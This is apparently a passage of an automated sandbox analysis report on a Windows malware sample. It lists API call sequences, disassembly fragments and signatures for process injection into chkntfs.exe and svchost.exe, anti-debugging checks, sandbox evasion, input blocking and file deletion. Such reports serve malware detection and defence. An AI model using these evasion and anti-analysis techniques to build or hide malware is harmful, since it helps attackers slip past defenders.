            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D44A9 push edx; retf 3_2_042D44AA
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D34CE push ds; ret 3_2_042D34D4
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D55AE push ecx; iretd 3_2_042D55B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042DD619 push ebx; retf 3_2_042DD662
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D469E push ss; iretd 3_2_042D46A4
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D4694 push es; ret 3_2_042D469A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042E1732 push esi; ret 3_2_042E1733
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042DC740 push edx; iretd 3_2_042DC741
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D6077 pushad ; iretd 3_2_042D6064
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042E5172 push eax; ret 3_2_042E5174
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_0099F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0099F98E
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A11C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00A11C41
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | API/Special instruction interceptor: Address: 963254
            Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E rdtsc | 1_2_03B7096E
            Source: C:\Windows\SysWOW64\chkntfs.exe | Window / User API: threadDelayed 2978
            Source: C:\Windows\SysWOW64\chkntfs.exe | Window / User API: threadDelayed 6994
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | API coverage: 4.1 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\chkntfs.exe | API coverage: 2.5 %
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 1196 | Thread sleep count: 2978 > 30
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 1196 | Thread sleep time: -5956000s >= -30000s
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 1196 | Thread sleep count: 6994 > 30
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 1196 | Thread sleep time: -13988000s >= -30000s
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe TID: 5448 | Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe TID: 5448 | Thread sleep time: -34500s >= -30000s
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe TID: 5448 | Thread sleep count: 31 > 30
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe TID: 5448 | Thread sleep time: -31000s >= -30000s
            Source: C:\Windows\SysWOW64\chkntfs.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\chkntfs.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_009EDBBE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009F68EE FindFirstFileW,FindClose, | 0_2_009F68EE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, | 0_2_009F698F
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_009ED076
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_009ED3A9
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_009F9642
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_009F979D
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, | 0_2_009F9B2B
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009F5C97 FindFirstFileW,FindNextFileW,FindClose, | 0_2_009F5C97
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004DC750 FindFirstFileW,FindNextFileW,FindClose, | 3_2_004DC750
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004DC886 FindFirstFileW,FindNextFileW,FindClose, | 3_2_004DC886
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_009842DE
            Source: SCsLZYqthBle.exe, 00000007.00000002.3535916497.000000000128F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
            Source: chkntfs.exe, 00000003.00000002.3535509329.0000000000798000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000008.00000002.2175924850.00000265B64BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\chkntfs.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E rdtsc | 1_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417A63 LdrLoadDll, | 1_2_00417A63
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009FEAA2 BlockInput, | 0_2_009FEAA2
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_009B2622
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_009842DE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009A4CE8 mov eax, dword ptr fs:[00000030h] | 0_2_009A4CE8
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009634C0 mov eax, dword ptr fs:[00000030h] | 0_2_009634C0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_00963520 mov eax, dword ptr fs:[00000030h] | 0_2_00963520
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_00961E70 mov eax, dword ptr fs:[00000030h] | 0_2_00961E70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h] | 1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h] | 1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h] | 1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h] | 1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h] | 1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h] | 1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h] | 1_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h] | 1_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B663FF mov eax, dword ptr fs:[00000030h] | 1_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDE3DB mov ecx, dword ptr fs:[00000030h] | 1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h] | 1_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h] | 1_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEC3CD mov eax, dword ptr fs:[00000030h] | 1_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB63C0 mov eax, dword ptr fs:[00000030h] | 1_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0634F mov eax, dword ptr fs:[00000030h] | 1_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2C310 mov ecx, dword ptr fs:[00000030h] | 1_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B50310 mov ecx, dword ptr fs:[00000030h] | 1_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h] | 1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h] | 1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h] | 1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD437C mov eax, dword ptr fs:[00000030h] | 1_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h] | 1_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C08324 mov ecx, dword ptr fs:[00000030h] | 1_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h] | 1_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h] | 1_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov ecx, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFA352 mov eax, dword ptr fs:[00000030h] | 1_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD8350 mov ecx, dword ptr fs:[00000030h] | 1_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h] | 1_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h] | 1_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C062D6 mov eax, dword ptr fs:[00000030h] | 1_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov ecx, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h] | 1_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h] | 1_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h] | 1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h] | 1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h] | 1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h] | 1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h] | 1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h] | 1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2823B mov eax, dword ptr fs:[00000030h] | 1_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0625D mov eax, dword ptr fs:[00000030h] | 1_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2826B mov eax, dword ptr fs:[00000030h]1_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A250 mov eax, dword ptr fs:[00000030h]1_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36259 mov eax, dword ptr fs:[00000030h]1_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]1_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]1_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB8243 mov eax, dword ptr fs:[00000030h]1_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB8243 mov ecx, dword ptr fs:[00000030h]1_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C061E5 mov eax, dword ptr fs:[00000030h]1_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B70185 mov eax, dword ptr fs:[00000030h]1_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]1_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]1_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]1_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]1_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B601F8 mov eax, dword ptr fs:[00000030h]1_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03BAE1D0
